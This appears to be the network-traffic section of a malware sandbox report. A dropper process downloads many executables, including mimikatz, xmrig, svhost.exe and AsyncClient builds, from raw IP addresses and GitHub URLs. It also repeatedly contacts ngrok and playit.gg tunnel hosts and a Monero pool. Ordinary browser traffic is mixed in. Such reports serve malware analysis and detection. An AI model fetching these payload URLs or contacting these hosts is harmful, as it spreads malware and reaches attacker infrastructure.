OPTIONS https://waa-pa.clients6.google.com/$rpc/google.internal.waa.v1.Waa/Ping
216.58.201.106:443

https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

tls, http2

firefox.exe

4.0kB
12.2kB
17
21

HTTP Request

POST https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
216.58.201.106:443

https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

tls, http2

firefox.exe

1.9kB
11.5kB
12
18

HTTP Request

OPTIONS https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
142.250.200.33:443

drive-thirdparty.googleusercontent.com

tls, http2

firefox.exe

1.4kB
10.3kB
11
12
142.250.187.202:443

https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

tls, http2

firefox.exe

14.3kB
23.4kB
36
47

HTTP Request

POST https://people-pa.clients6.google.com/batch?%24ct=multipart%2Fmixed%3B%20boundary%3D%22%3D%3D%3D%3D%3Ds0xdxjmhm500%3D%3D%3D%3D%3D%22&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

GET https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

GET https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

GET https://drivefrontend-pa.clients6.google.com/v1/account?alt=protojson&fields=account.drive_for_desktop_settings.switchblade_psk%2Caccount.enterprise_settings.can_access_admin_console%2Caccount.metadata.backend_diagnostics.backend%2Caccount.metadata.gsuite_subscription_info.status%2Caccount.metadata.gsuite_subscription_info.trial_end_time_millis%2Caccount.metadata.gsuite_subscription_info.trial_millis_remaining%2Caccount.metadata.import_format%2Caccount.metadata.quota.bytes_limit%2Caccount.metadata.quota.bytes_remaining%2Caccount.metadata.quota.bytes_used_by_all_services%2Caccount.metadata.quota.bytes_used_by_user%2Caccount.metadata.quota.bytes_used_in_drive_trash_by_user%2Caccount.metadata.quota.grace_period_info.active%2Caccount.metadata.quota.grace_period_info.additional_quota_bytes%2Caccount.metadata.quota.grace_period_info.end_timestamp_millis%2Caccount.metadata.quota.individual_bytes_limit%2Caccount.metadata.quota.individual_usage_state%2Caccount.metadata.quota.quota_bytes_total%2Caccount.metadata.quota.quota_bytes_used%2Caccount.metadata.quota.quota_bytes_used_aggregate%2Caccount.metadata.quota.quota_bytes_used_in_trash%2Caccount.metadata.quota.quota_status%2Caccount.metadata.quota.quota_type%2Caccount.metadata.quota.service_usage.bytes_used%2Caccount.metadata.quota.service_usage.service_key%2Caccount.metadata.quota.usage_state%2Caccount.metadata.root_folder_id%2Caccount.metadata.target_audiences.audience_id%2Caccount.metadata.target_audiences.display_name%2Caccount.metadata.team_dashboard_capabilities.can_administer_team%2Caccount.metadata.team_dashboard_capabilities.can_manage_invites%2Caccount.search_settings.can_display_zero_state_search%2Caccount.shared_drives_settings.can_create_shared_drives%2Caccount.shared_drives_settings.can_interact_with_shared_drives%2Caccount.shared_drives_settings.can_migrate_to_shared_drives_as_admin%2Caccount.shared_drives_settings.has_shared_drives%2Caccount.storage_settings.can_buy_storage%2Caccount.user.email_from_account%2Caccount.user.focus_user_id%2Caccount.user.id%2Caccount.user.photo_url%2Caccount.user.short_name%2Caccount.user_pref%2Caccount.view_settings.show_machine_root_view%2Caccount.workspace_settings.can_create_workspaces&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

GET https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8
142.250.187.202:443

https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

tls, http2

firefox.exe

5.1kB
12.3kB
20
28

HTTP Request

OPTIONS https://drivefrontend-pa.clients6.google.com/v1/account?alt=protojson&fields=account.drive_for_desktop_settings.switchblade_psk%2Caccount.enterprise_settings.can_access_admin_console%2Caccount.metadata.backend_diagnostics.backend%2Caccount.metadata.gsuite_subscription_info.status%2Caccount.metadata.gsuite_subscription_info.trial_end_time_millis%2Caccount.metadata.gsuite_subscription_info.trial_millis_remaining%2Caccount.metadata.import_format%2Caccount.metadata.quota.bytes_limit%2Caccount.metadata.quota.bytes_remaining%2Caccount.metadata.quota.bytes_used_by_all_services%2Caccount.metadata.quota.bytes_used_by_user%2Caccount.metadata.quota.bytes_used_in_drive_trash_by_user%2Caccount.metadata.quota.grace_period_info.active%2Caccount.metadata.quota.grace_period_info.additional_quota_bytes%2Caccount.metadata.quota.grace_period_info.end_timestamp_millis%2Caccount.metadata.quota.individual_bytes_limit%2Caccount.metadata.quota.individual_usage_state%2Caccount.metadata.quota.quota_bytes_total%2Caccount.metadata.quota.quota_bytes_used%2Caccount.metadata.quota.quota_bytes_used_aggregate%2Caccount.metadata.quota.quota_bytes_used_in_trash%2Caccount.metadata.quota.quota_status%2Caccount.metadata.quota.quota_type%2Caccount.metadata.quota.service_usage.bytes_used%2Caccount.metadata.quota.service_usage.service_key%2Caccount.metadata.quota.usage_state%2Caccount.metadata.root_folder_id%2Caccount.metadata.target_audiences.audience_id%2Caccount.metadata.target_audiences.display_name%2Caccount.metadata.team_dashboard_capabilities.can_administer_team%2Caccount.metadata.team_dashboard_capabilities.can_manage_invites%2Caccount.search_settings.can_display_zero_state_search%2Caccount.shared_drives_settings.can_create_shared_drives%2Caccount.shared_drives_settings.can_interact_with_shared_drives%2Caccount.shared_drives_settings.can_migrate_to_shared_drives_as_admin%2Caccount.shared_drives_settings.has_shared_drives%2Caccount.storage_settings.can_buy_storage%2Caccount.user.email_from_account%2Caccount.user.focus_user_id%2Caccount.user.id%2Caccount.user.photo_url%2Caccount.user.short_name%2Caccount.user_pref%2Caccount.view_settings.show_machine_root_view%2Caccount.workspace_settings.can_create_workspaces&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

OPTIONS https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

OPTIONS https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

HTTP Request

OPTIONS https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8
142.250.187.202:443

drivefrontend-pa.clients6.google.com

tls, http2

firefox.exe

1.4kB
10.8kB
10
13
142.250.187.202:443

drivefrontend-pa.clients6.google.com

tls, http2

firefox.exe

1.4kB
10.8kB
10
13
142.250.187.202:443

drivefrontend-pa.clients6.google.com

tls, http2

firefox.exe

1.4kB
10.8kB
11
14
142.250.187.202:443

people-pa.clients6.google.com

firefox.exe

98 B
52 B
2
1
142.250.187.202:443

people-pa.clients6.google.com

firefox.exe

98 B
52 B
2
1
142.250.187.202:443

people-pa.clients6.google.com

firefox.exe

98 B
52 B
2
1
142.250.187.202:443

people-pa.clients6.google.com

tls, http2

firefox.exe

1.4kB
10.9kB
11
15
216.58.212.202:443

https://appsgrowthpromo-pa.clients6.google.com/v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson

tls, http2

firefox.exe

4.2kB
13.1kB
18
23

HTTP Request

POST https://appsgrowthpromo-pa.clients6.google.com/v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson
216.58.212.202:443

https://appsgrowthpromo-pa.clients6.google.com/v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson

tls, http2

firefox.exe

2.1kB
11.5kB
13
17

HTTP Request

OPTIONS https://appsgrowthpromo-pa.clients6.google.com/v1/promotion/FetchRecommendation?key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8&alt=protojson
142.250.180.10:443

https://addons-pa.clients6.google.com/$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations

tls, http2

firefox.exe

3.9kB
12.8kB
16
23

HTTP Request

POST https://addons-pa.clients6.google.com/$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations
142.250.180.10:443

https://addons-pa.clients6.google.com/$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations

tls, http2

firefox.exe

1.9kB
11.5kB
12
18

HTTP Request

OPTIONS https://addons-pa.clients6.google.com/$rpc/google.internal.apps.addons.v1.AddOnService/ListInstallations
142.250.200.3:443

ssl.gstatic.com

tls, http2

firefox.exe

1.3kB
5.1kB
9
9
142.250.179.234:443

youtube.googleapis.com

tls, http2

firefox.exe

1.4kB
5.5kB
10
9
172.217.169.78:443

drive.google.com

tls, http2

chrome.exe

953 B
8.1kB
8
9
142.251.173.84:443

accounts.google.com

tls, http2

chrome.exe

1.0kB
5.6kB
8
8
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
142.250.178.14:443

ogs.google.com

tls, http2

firefox.exe

1.4kB
7.6kB
11
10
142.250.178.14:443

contacts.google.com

tls, http2

firefox.exe

1.4kB
7.7kB
10
12
172.217.169.74:443

https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ

tls, http2

firefox.exe

4.0kB
12.7kB
18
25

HTTP Request

POST https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ
172.217.169.74:443

https://signaler-pa.clients6.google.com/punctual/multi-watch/channel?VER=8&gsessionid=N-Ne7PC9x8s47isWYIAVHGNK9ZUCiJXT_UmU-cTVqbQ&key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ&RID=81531&CVER=22&zx=tf45q0s82vdc&t=1

tls, http2

firefox.exe

2.4kB
12.0kB
17
26

HTTP Request

OPTIONS https://signaler-pa.clients6.google.com/punctual/v1/chooseServer?key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ

HTTP Request

OPTIONS https://signaler-pa.clients6.google.com/punctual/multi-watch/channel?VER=8&gsessionid=N-Ne7PC9x8s47isWYIAVHGNK9ZUCiJXT_UmU-cTVqbQ&key=AIzaSyAWGrfCCr7albM3lmCc937gx4uIphbpeKQ&RID=81531&CVER=22&zx=tf45q0s82vdc&t=1
35.190.72.216:443

https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb

tls, http2

firefox.exe

1.7kB
4.6kB
12
13

HTTP Request

GET https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
88.221.134.209:80

http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

http

firefox.exe

5.6kB
506.5kB
116
369

HTTP Request

GET http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

HTTP Response

200
142.250.180.14:443

https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip

tls, http2

firefox.exe

1.6kB
8.9kB
17
21

HTTP Request

GET https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
172.217.132.199:443

https://r2---sn-5hnednss.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1736791513,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1736790718&mv=u&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com

tls, http

firefox.exe

276.5kB
15.3MB
4512
10935

HTTP Request

GET https://r2---sn-5hnednss.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1736791513,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1736790718&mv=u&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com

HTTP Response

200
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
185.199.111.133:443

https://raw.githubusercontent.com/TOP-executors/JJsploit/refs/heads/main/JJSPLOIT.V2.exe

tls, http

._cache_New Text Document mod.exe

71.5kB
4.2MB
1490
2991

HTTP Request

GET https://raw.githubusercontent.com/AnshuOp0001/aaaaaaa/refs/heads/main/Client.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/Sichostexe/LoxFiles/refs/heads/main/Fixer.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/M4HVH2/dwadwa/refs/heads/main/Client-built.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/ymykaliymy/ymy/refs/heads/main/sela.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/TOP-executors/JJsploit/refs/heads/main/JJSPLOIT.V2.exe

HTTP Response

200
151.106.34.115:6573

http://151.106.34.115:6573/svhost.exe

http

._cache_New Text Document mod.exe

53.7kB
7.2MB
1104
5170

HTTP Request

GET http://151.106.34.115:6573/svhost.exe

HTTP Response

200
47.104.181.208:1000

._cache_Synaptics.exe

260 B
5
31.41.244.11:80

._cache_New Text Document mod.exe

260 B
5
45.138.16.193:80

._cache_New Text Document mod.exe

260 B
5
13.127.206.16:10147

0.tcp.in.ngrok.io

Client.exe

260 B
200 B
5
5
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
147.185.221.25:11758

other-little.gl.at.ply.gg

DirectX111.exe

260 B
5
45.93.20.67:80

._cache_New Text Document mod.exe

260 B
5
185.215.113.16:80

._cache_New Text Document mod.exe

260 B
5
142.250.178.10:443

signaler-pa.clients6.google.com

tls, http2

chrome.exe

1.1kB
11.3kB
9
12
34.97.161.128:443

https://e2c4.gcp.gvt2.com/nel/

tls, http2

chrome.exe

3.1kB
5.5kB
15
14

HTTP Request

POST https://e2c4.gcp.gvt2.com/nel/

HTTP Response

204
34.97.161.128:443

e2c4.gcp.gvt2.com

tls, http2

chrome.exe

1.1kB
5.2kB
9
9
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
13.127.206.16:10147

0.tcp.in.ngrok.io

Client.exe

260 B
200 B
5
5
13.127.206.16:14296

0.tcp.in.ngrok.io

Client-base.exe

260 B
200 B
5
5
13.202.226.61:10147

0.tcp.in.ngrok.io

Client.exe

260 B
200 B
5
5
45.93.20.67:80

260 B
5
13.202.226.61:14296

0.tcp.in.ngrok.io

260 B
200 B
5
5
151.101.130.49:443

urlhaus.abuse.ch

tls

6.1kB
661.3kB
125
482
101.36.117.41:8081

http://101.36.117.41:8081/02.08.2022.exe

http

2.4kB
217.5kB
51
159

HTTP Request

GET http://101.36.117.41:8081/02.08.2022.exe

HTTP Response

200
106.53.83.169:80

260 B
5
87.121.86.2:8080

http://87.121.86.2:8080/mimikatz.exe

http

8.1kB
1.4MB
175
1003

HTTP Request

GET http://87.121.86.2:8080/mimikatz.exe

HTTP Response

200
47.90.142.15:2333

http://47.90.142.15:2333/123.exe

http

764 B
76.4kB
15
59

HTTP Request

GET http://47.90.142.15:2333/123.exe

HTTP Response

200
82.58.168.32:80

http://82.58.168.32/xmrig.exe

http

63.0kB
9.8MB
1369
7012

HTTP Request

GET http://82.58.168.32/xmrig.exe

HTTP Response

200
47.90.142.15:4567

2.6kB
2.0kB
50
50
31.41.244.11:80

260 B
5
13.202.226.61:10147

0.tcp.in.ngrok.io

260 B
200 B
5
5
23.27.51.244:80

http://23.27.51.244/chrtrome22.exe

http

1.1kB
14.2kB
22
14

HTTP Request

GET http://23.27.51.244/chrtrome22.exe

HTTP Response

200
45.93.20.67:80

260 B
5
185.215.113.66:80

260 B
5
13.202.226.61:14296

0.tcp.in.ngrok.io

260 B
200 B
5
5
147.185.221.25:11758

other-little.gl.at.ply.gg

260 B
5
185.215.113.16:80

260 B
5
113.31.111.76:80

260 B
5
89.23.101.77:1912

260 B
5
151.101.130.49:443

urlhaus.abuse.ch

tls

5.0kB
661.4kB
101
483
20.26.156.215:443

github.com

tls

1.0kB
8.6kB
10
12
185.199.111.133:443

raw.githubusercontent.com

tls

60.7kB
6.7MB
1133
4839
185.199.110.133:443

objects.githubusercontent.com

tls

28.4kB
2.8MB
582
1976
195.177.92.88:80

http://195.177.92.88/build.exe

http

1.6kB
317.1kB
33
229

HTTP Request

GET http://195.177.92.88/build.exe

HTTP Response

200
106.53.83.169:80

260 B
5
104.21.95.99:443

evilbit.pro

tls

849 B
4.6kB
7
8
195.177.92.88:1912

2.5MB
32.0kB
1843
645
13.202.226.61:10147

0.tcp.in.ngrok.io

260 B
200 B
5
5
13.202.226.61:14296

0.tcp.in.ngrok.io

260 B
200 B
5
5
13.202.226.61:10147

0.tcp.in.ngrok.io

260 B
200 B
5
5
13.202.226.61:14296

0.tcp.in.ngrok.io

260 B
200 B
5
5
45.93.20.67:80

260 B
5
185.215.113.16:80

260 B
5
142.250.187.196:443

www.google.com

tls

3.9kB
14.5kB
29
35
185.81.68.147:80

260 B
5
31.41.244.11:80

260 B
5
13.202.226.61:14296

0.tcp.in.ngrok.io

260 B
200 B
5
5
45.138.16.193:80

260 B
5
45.93.20.67:80

260 B
5
20.26.156.215:80

http://github.com/thomson101/XHP/releases/download/Release/Steanings.exe

http

390 B
310 B
6
4

HTTP Request

GET http://github.com/thomson101/XHP/releases/download/Release/Steanings.exe

HTTP Response

301
20.26.156.215:443

github.com

tls

854 B
8.3kB
10
12
185.199.110.133:443

objects.githubusercontent.com

tls

6.6kB
323.8kB
124
241
13.202.226.61:10147

0.tcp.in.ngrok.io

260 B
200 B
5
5
185.215.113.16:80

260 B
5
212.56.41.77:1912

6.4MB
74.9kB
4658
1539
172.217.169.78:443

drive.google.com

tls

1.1kB
8.1kB
9
9
142.250.200.33:443

lh3.googleusercontent.com

tls

1.1kB
10.8kB
10
11
142.250.200.3:443

ssl.gstatic.com

tls

999 B
5.6kB
9
8
142.250.187.238:443

clients6.google.com

tls

1.1kB
8.1kB
9
9
142.250.187.202:443

waa-pa.clients6.google.com

tls

1.2kB
11.3kB
11
12
216.58.201.106:443

ogads-pa.clients6.google.com

tls

1.2kB
11.3kB
11
12
147.185.221.25:11758

other-little.gl.at.ply.gg

260 B
5
142.250.187.202:443

waa-pa.clients6.google.com

tls

1.1kB
11.3kB
11
12
142.251.173.84:443

accounts.google.com

tls

1.0kB
5.6kB
9
8
66.63.187.250:80

http://66.63.187.250/zmk/gem1.exe

http

82.8kB
4.2MB
1741
3022

HTTP Request

GET http://66.63.187.250/zmk/gem2.exe

HTTP Response

200

HTTP Request

GET http://66.63.187.250/zmk/gem1.exe

HTTP Response

200
142.250.179.238:443

play.google.com

tls

1.0kB
7.6kB
9
9
142.250.179.238:443

play.google.com

tls

989 B
7.6kB
9
9
142.250.200.10:443

people-pa.clients6.google.com

tls

1.2kB
11.3kB
11
12
142.250.187.234:443

appsgrowthpromo-pa.clients6.google.com

tls

1.2kB
11.3kB
11
12
142.250.187.234:443

appsgrowthpromo-pa.clients6.google.com

tls

1.2kB
12.4kB
11
13
13.202.226.61:14296

0.tcp.in.ngrok.io

260 B
200 B
5
5
89.23.101.77:1912

260 B
5
142.250.178.10:443

signaler-pa.clients6.google.com

tls

1.1kB
11.3kB
11
12
142.250.178.14:443

contacts.google.com

tls

1.0kB
8.1kB
9
9
142.250.178.10:443

signaler-pa.clients6.google.com

tls

1.0kB
11.3kB
10
12
13.202.226.61:10147

0.tcp.in.ngrok.io

260 B
200 B
5
5
185.215.113.16:80

260 B
5
66.63.187.173:15666

20.6MB
274.4kB
14813
6497
104.26.13.205:443

api.ipify.org

tls

919 B
4.4kB
10
8
13.202.226.61:14296

0.tcp.in.ngrok.io

260 B
200 B
5
5
45.93.20.67:80

260 B
5
185.215.113.16:80

260 B
5
13.202.226.61:10147

0.tcp.in.ngrok.io

260 B
160 B
5
4
113.31.111.76:80

260 B
5
13.202.226.61:14296

0.tcp.in.ngrok.io

260 B
200 B
5
5
185.215.113.66:80

260 B
5
20.26.156.215:80

http://github.com/legendary6911331/zakaz8/releases/download/safasf/AsyncClientGK.exe

http

678 B
282 B
12
3

HTTP Request

GET http://github.com/legendary6911331/zakaz8/releases/download/safasf/AsyncClientGK.exe

HTTP Response

301
20.26.156.215:443

github.com

tls

1.1kB
12.5kB
13
16
185.199.110.133:443

objects.githubusercontent.com

tls

2.1kB
53.6kB
27
47
45.93.20.67:80

260 B
5

8.8.8.8:53

180.129.81.91.in-addr.arpa

dns

NetworkService

1.6kB
3.1kB
24
24

DNS Request

180.129.81.91.in-addr.arpa

DNS Request

85.49.80.91.in-addr.arpa

DNS Request

raw.githubusercontent.com

DNS Response

185.199.111.133

185.199.110.133

185.199.108.133

185.199.109.133

DNS Request

49.194.101.151.in-addr.arpa

DNS Request

88.92.177.195.in-addr.arpa

DNS Request

ocsp.digicert.com

DNS Response

192.229.221.95

DNS Request

0.tcp.in.ngrok.io

DNS Response

13.127.206.16

DNS Request

other-little.gl.at.ply.gg

DNS Response

147.185.221.25

DNS Request

freedns.afraid.org

DNS Response

69.42.215.252

DNS Request

api.ipify.org

DNS Response

104.26.13.205

104.26.12.205

172.67.74.152

DNS Request

c.pki.goog

DNS Response

142.250.178.3

DNS Request

173.187.63.66.in-addr.arpa

DNS Request

3.178.250.142.in-addr.arpa

DNS Request

clientservices.googleapis.com

DNS Response

142.250.178.3

DNS Request

174.117.168.52.in-addr.arpa

DNS Request

www.google.com

DNS Response

142.250.187.196

DNS Request

clients2.google.com

DNS Response

142.250.187.238

DNS Request

238.187.250.142.in-addr.arpa

DNS Request

pool.supportxmr.com

DNS Response

141.94.96.195

141.94.96.144

141.94.96.71

DNS Request

drive.google.com

DNS Response

172.217.169.78

DNS Request

workspace.google.com

DNS Response

142.250.200.46

DNS Request

84.173.251.142.in-addr.arpa

DNS Request

storage.googleapis.com

DNS Request

storage.googleapis.com

DNS Response

142.250.179.251

172.217.169.91

216.58.212.251

142.250.178.27

216.58.212.219

172.217.16.251

216.58.213.27

142.250.187.219

142.250.200.59

142.250.187.251

216.58.201.123

172.217.169.27

142.250.200.27

142.250.180.27

216.58.204.91

DNS Response

216.58.201.123

216.58.212.251

216.58.213.27

142.250.187.219

142.250.179.251

142.250.200.59

172.217.169.91

216.58.212.219

216.58.204.91

172.217.169.27

142.250.187.251

142.250.180.27

142.250.200.27

172.217.16.251

142.250.178.27
224.0.0.251:5353

chrome.exe

1.2kB
19
8.8.8.8:53

205.13.26.104.in-addr.arpa

dns

NetworkService

868 B
2.1kB
12
12

DNS Request

205.13.26.104.in-addr.arpa

DNS Request

self.events.data.microsoft.com

DNS Response

52.168.117.174

DNS Request

www.googleapis.com

DNS Response

216.58.204.74

142.250.200.10

216.58.201.106

172.217.16.234

172.217.169.42

142.250.200.42

142.250.179.234

142.250.180.10

142.250.178.10

172.217.169.10

216.58.212.202

142.250.187.234

142.250.187.202

216.58.212.234

DNS Request

74.204.58.216.in-addr.arpa

DNS Request

clients2.googleusercontent.com

DNS Response

142.250.200.33

DNS Request

33.200.250.142.in-addr.arpa

DNS Request

195.96.94.141.in-addr.arpa

DNS Request

accounts.google.com

DNS Response

142.251.173.84

DNS Request

78.169.217.172.in-addr.arpa

DNS Request

lh3.googleusercontent.com

DNS Response

142.250.200.33

DNS Request

content-autofill.googleapis.com

DNS Response

142.250.187.202

216.58.201.106

142.250.179.234

172.217.169.10

172.217.16.234

142.250.180.10

142.250.187.234

142.250.200.10

142.250.178.10

172.217.169.42

216.58.212.234

216.58.204.74

142.250.200.42

216.58.212.202

172.217.169.74

216.58.213.10

DNS Request

content-autofill.googleapis.com

DNS Response

216.58.212.234

142.250.179.234

142.250.178.10

142.250.180.10

